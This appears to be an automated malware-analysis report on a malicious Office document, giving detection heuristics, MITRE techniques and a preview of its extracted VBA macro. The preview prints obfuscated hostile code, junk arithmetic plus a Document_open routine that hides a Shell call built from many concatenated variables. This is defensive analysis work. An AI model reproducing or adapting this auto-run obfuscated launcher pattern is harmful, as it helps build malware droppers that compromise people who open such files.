MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, suggesting it attempts to execute external commands. The ClamAV detection name 'Doc.Malware.Valyria-6744893-0' further confirms its malicious nature. The VBA macro's primary function appears to be executing a shell command, likely to download and execute a second-stage payload, which is a common technique for malware delivery.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6744893-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6744893-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57073 bytes |
SHA-256: efd69becae3e381584d61a6634bc2e52ff2aa61885908ff9078309764fee254b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CMhRuMUYwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function tpUwMNTwZlvM()
On Error Resume Next
UhwzCk = CPfplF - HQoWEG + 94882 + 69231 * jsODiH + ozkOZ - 84064 * wPzVt / iARiBS * Zmaqpk
hiRfl = iZrKnw - GUzCO + 86653 + 42596 * hnljH + dUidz - 91029 * ztHwBu / jHFiq * PlQlw
IiIqw = AKBXw - LXPIo + 89313 + 70453 * aKJBJm + fSwmLv - 46266 * zphFDb / WVqPum * WulGf
WkBHBM = aQwiA - oEaizY + 4584 + 38588 * vdsTm + umhYm - 99621 * wPsFzZ / YVPMP * twHzoQ
UHjLiU = ElmSnc - THojX + 71393 + 77841 * KtrwWv + AEQYz - 55894 * BtZGwS / DwHJqD * wZIOIf
Ezqjwd = FEIhqB - JarFMw + 1698 + 50623 * iCqns + EzjSCa - 95755 * bzXDQ / zXspiG * Yfjjr
FojDv = qrArW - HpGFk + 6856 + 83767 * fajCL + kCXuY - 78103 * qtbSRw / oJQqfD * jjVFls
oYOiZ = jiRJNw - GLlsZ + 56064 + 2193 * aNjDHT + ijkWnV - 19035 * iXZbmu / GwQWm * WFPnKX
End Function
Private Function UuczhadE()
On Error Resume Next
ulOUl = FhdiTt - OQKaj + 93015 + 1862 * oKUTU + wlVdl - 14645 * FrwUk / cJzKz * VrKLTt
cXOSC = VGUdK - IILlfw + 9941 + 61091 * sErYlA + ooITWi - 75960 * GAlzsl / nlfZdl * QzCzUj
sAZsQ = jVnRiS - ccMjTV + 57327 + 86705 * nkpBG + swZpiE - 29691 * SNDOp / fVhCI * UUrKjS
WGbtAR = IvIEh - uIYOFw + 73386 + 47562 * ozVmwU + aCkEbz - 99290 * CUTnT / rGRva * mwNvvH
MoCOs = cosojh - PuVQG + 76957 + 66497 * RCntGQ + HPGQo - 92600 * dLpWr / qdsSam * aVtdi
End Function
Private Function IisjUnUGShT()
On Error Resume Next
TDYnl = GaNzF - ikLNE + 87568 + 7112 * BwiXq + XfSjJd - 35792 * QoUPMX / aVNlB * OCLaY
rFhwHO = hfzAa - VkXaH + 51302 + 44974 * zUIlr + bwNwpT - 89184 * zrzHE / iDqSO * ndwUY
imTFEU = JpWIi - WCpnv + 18871 + 6689 * TnZRS + oKXzk - 36822 * BimjoS / USIjC * RSQfl
VtkYL = mhkRA - HIGmj + 54971 + 98795 * Orudq + Vowwt - 45846 * EZVNSm / SbtlqG * NhqRs
IWYBz = oaHjo - nwTWto + 64256 + 62227 * aaRmo + IcHFl - 12238 * YtPSR / ioSpZ * NVujR
hKwtn = UhzSYY - MUTDG + 13420 + 83678 * tBfpPz + WtrLaF - 11888 * jssCzj / AjLrH * wNZiRb
End Function
Private Function QWrRfVqYaUjfiM()
On Error Resume Next
azrndc = FRYfK - luGLpb + 77185 + 80529 * jWVWbA + VvVFl - 83640 * LSmNQG / vFqtX * FSdzSv
EmiwSS = LlRPAz - tXAdM + 66253 + 37458 * tobUF + rnsdEk - 73043 * AQbFh / KTYcl * fCiRz
LGRFsM = sNYKR - NDLjG + 41548 + 51223 * UHSvH + IEwllu - 19526 * dCRBD / zEGKY * NRVwXq
VSHAW = vdJEFu - vtCNX + 68641 + 15422 * QfcEDQ + RXnpu - 30913 * AfMuXZ / wlocj * YajuM
rwzKlN = nRmZX - EZJSF + 33865 + 51126 * QAHWH + rizOuM - 44772 * fCGPq / LmTkBl * rMiSZ
End Function
Private Sub Document_open()
On Error Resume Next
BDflI = jBnisB - ZjcVlu + 51080 + 15492 * BfbPjm + PzRhp - 10746 * kHlzdO / zsbkZ * bEzmSM
aBLKO = zWNhwE - QdGRI + 6495 + 23486 * diXsuF + rTCnt - 21572 * YZmism / lmTDPo * dYpoJ
ToRTtp = tiJKKn - jidKZ + 68731 + 84224 * DpfQzN + MwjWfF - 70864 * KzzOr / KsEBG * tLdkFF
Shell "" + KtItwYjbTzTDrO + wtbBnzfKvbKziP + CVar("c") + alwsrkQ + QHkFnkqzr + dTUEFJT + LaJnrfIm + YPpzwPPWafm + rjIINJIto + COCXnlTiBTj + lPVYKWKHB + SZcHXNzpic + cQFtNUhdIh + hFUdzvDjV + lhGmrzoZvi + iabbLYBc + uZiXLKJz + tzOiPYpI + itimN + EHiVnzz + Vlpjw + YzPoj + MKVXFifJSi + fMFrhkNiGKN + jSEsKUiBUB + JcGIqzXK + mKVjUU + OPzzzRK + qSsfE + AohbhUC + tikbSiDUT + ocrRzRKboIw + TKbVAosz, 0
VCVXQ = ODSrL - RWDCv + 50696 + 26759 * FCZji + SHmiU - 46779 * tSiVqz / qlLWPA * LnPRT
rQBBU = QZizsV - GwspA + 32681 + 31472 * HAjsTI + FisfON - 99089 * zQpbX / QwRznV * IzsjK
QRJBqj = zGNHJ - wuYKp + 86229 + 18383 * ESujnL + jAzErO - 70015 * HolqOQ / EpdObO * hrRNtM
End Sub
Private Function cjzHipTVRwdFk()
On Error Resume Next
SObKC = wlUcw - WYKBu + 81260 + 96110 * BNDrdX + FdkZvc - 24677 * iXLAb / rVVSk * hTzCJ
WrOiKo = oHbBm - hwdFp + 8766 + 37622 * kaFOJ + QGuMPw - 33553 * Ujsdq / iWHkj * cAjli
qqzSRD = YKCowT - dhjUl + 27551 + 3346
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.